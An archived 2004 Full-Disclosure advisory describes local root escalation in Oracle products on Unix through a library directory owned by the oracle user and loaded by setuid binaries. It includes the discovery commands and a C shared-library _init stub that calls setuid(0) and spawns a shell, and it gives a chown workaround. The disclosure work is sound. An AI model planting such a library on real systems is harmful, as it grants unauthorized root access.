[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-Disclosure] OPEN3S - Local Privilege Elevation through Oracle products (Unix
From: Juan Manuel Pascual <jmpascual () open3s ! com>
Date: 2004-07-30 9:28:39
Message-ID: 410A14C7.4050709 () open3s ! com
[Download RAW message or body]
*----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------
*
* Title:* Local Vulnerability in Oracle Products. RDBMS, IAs, etc
*All Versions*. (10g not tested)
* Date:* 10-05-2004
* Platform:* Tested in Linux, Solaris & HP-UX but can be exported to others.
* Impact:* Privilege elevation from oracle products installation owner
(usually called oracle or ias ) to root.
* Author:* Juan Manuel Pascual Escriba <mailto:jmpascual@open3s.com>
* Status:* Vendor contacted details below.
*INTRODUCTION:*
Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer,
claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.
*PROBLEM SUMMARY:*
This software version
- Oracle 8i Linux Platform
- Oracle 9i Linux Platform
- Oracle 8i HP-UX Platform
- Oracle 9i Solaris Platform
- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
- All versions tested in Unix platform (Universal?¿)
are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
iasr2) to root.
*DESCRIPTION*
Oracle Libraries are installed owned by oracle in a default installation of the products
commented above.
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
As you can see, the lib directory owner is iasr2, let's look for some setuid binaries
[pask@dimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo
And now, just could see the shared objects that the binaries depends.
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
libkstat.so.1 => /usr/lib/libkstat.so.1
....
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
libnsl.so.1 => /usr/lib/libnsl.so.1
libsocket.so.1 => /usr/lib/libsocket.so.1
libgen.so.1 => /usr/lib/libgen.so.1
.....
ups, it's not posible to achieve root privileges with this binary and by this way
For iasr2 user is too easy to create a so.lib, something like
#include
#include
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
*IMPACT*
oracle,ias,iasr2 or iasdb users with local access can gain root privileges through
oracle installation
*EXPLOIT*
commented above.
*WORKAROUND*
chown to root lib directory and parent directory.
*STATUS*
Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that
only trusted users should have access to the local iasdb user account".
I have no information about a patch or a solution from Oracle Corp.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba jmpascual@open3s.com
Barcelona - Denia - Spain http://www.open3s.com
[Attachment #3 (text/html)]
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
<title></title>
</head>
<body bgcolor="#ffffff" text="#000000">
<meta content="text/html;charset=ISO-8859-1" http-equiv="Content-Type">
<title></title>
<pre><b>----------========== OPEN3S-2004-10-05-eng-oracle-so-libraries ==========----------
</b>
<b> Title:</b> Local Vulnerability in Oracle Products. RDBMS, IAs, etc
<b>All Versions</b>. (10g not tested)
<b> Date:</b> 10-05-2004
<b> Platform:</b> Tested in Linux, Solaris & HP-UX but can be exported to others.
<b> Impact:</b> Privilege elevation from oracle products installation owner
(usually called oracle or ias ) to root.
<b> Author:</b> <a href="mailto:jmpascual@open3s.com">Juan Manuel Pascual Escriba</a>
<b> Status:</b> Vendor contacted details below.
<b>INTRODUCTION:</b>
Oracle Corporation (nasdaqNM - ORCL) is a world leading database software developer,
claiming to develop an unbreakable software. It's products are targeted in database,
application server and data mining market.
<b>PROBLEM SUMMARY:</b>
This software version
- Oracle 8i Linux Platform
- Oracle 9i Linux Platform
- Oracle 8i HP-UX Platform
- Oracle 9i Solaris Platform
- Oracle IAS 9.0.2.0.1 with patchset v9.0.2.3
- All versions tested in Unix platform (Universal?¿)
are suitable to privilege elevation from oracle software owner ( normally oracle,ias,
iasr2) to root.
<b>DESCRIPTION</b>
Oracle Libraries are installed owned by oracle in a default installation of the products
commented above.
[pask@dimoniet home]$ ls -alc /export/home/iasr2/ora9ias_mid
...
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 lbs
drwxr-xr-x 15 iasr2 dba 512 Jan 7 12:13 ldap
drwxr-xr-x 3 iasr2 dba 12800 Nov 21 11:22 lib
drwxr-xr-x 13 iasr2 dba 512 Nov 21 14:04 network
drwxr-xr-x 3 iasr2 dba 512 Nov 21 14:04 ocommon
...
As you can see, the lib directory owner is iasr2, let's look for some setuid binaries
[pask@dimoniet ora9ias_mid]$ find ./ -perm +4000
./bin/dbsnmp
./bin/nmo
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/dbsnmp
-rwsr-s--- 1 root dba 2900980 Nov 21 14:04 ./bin/dbsnmp
[iasr2@dimoniet ora9ias_mid]$ ls -alc ./bin/nmo
-rwsr-s--- 1 root dba 12632 Nov 21 14:04 ./bin/nmo
And now, just could see the shared objects that the binaries depends.
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/dbsnmp
libvppdc.so => /export/home/iasr2/ora9ias_mid/lib/libvppdc.so
libclntsh.so.9.0 => /export/home/iasr2/ora9ias_mid/lib/libclntsh.so.9.0
libwtc9.so => /export/home/iasr2/ora9ias_mid/lib//libwtc9.so
libthread.so.1 => /usr/lib/libthread.so.1
libkstat.so.1 => /usr/lib/libkstat.so.1
....
[iasr2@dimoniet ora9ias_mid]$ ldd ./bin/nmo
libnsl.so.1 => /usr/lib/libnsl.so.1
libsocket.so.1 => /usr/lib/libsocket.so.1
libgen.so.1 => /usr/lib/libgen.so.1
.....
ups, it's not posible to achieve root privileges with this binary and by this way
For iasr2 user is too easy to create a so.lib, something like
#include <stdio.h>
#include <string.h>
_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}
<b>IMPACT</b>
oracle,ias,iasr2 or iasdb users with local access can gain root privileges through
oracle installation
<b>EXPLOIT</b>
commented above.
<b>WORKAROUND</b>
chown to root lib directory and parent directory.
<b>STATUS</b>
Oracle Security Alerts explains in an email sent 26/07/2004 that "Oracle believes that
only trusted users should have access to the local iasdb user account".
I have no information about a patch or a solution from Oracle Corp.
--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba <a
class="moz-txt-link-abbreviated" href="mailto:jmpascual@open3s.com">jmpascual@open3s.com</a>
Barcelona - Denia - Spain <a
href="http://www.open3s.com">http://www.open3s.com</a>
</string.h></stdio.h></pre>
</body>
</html>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic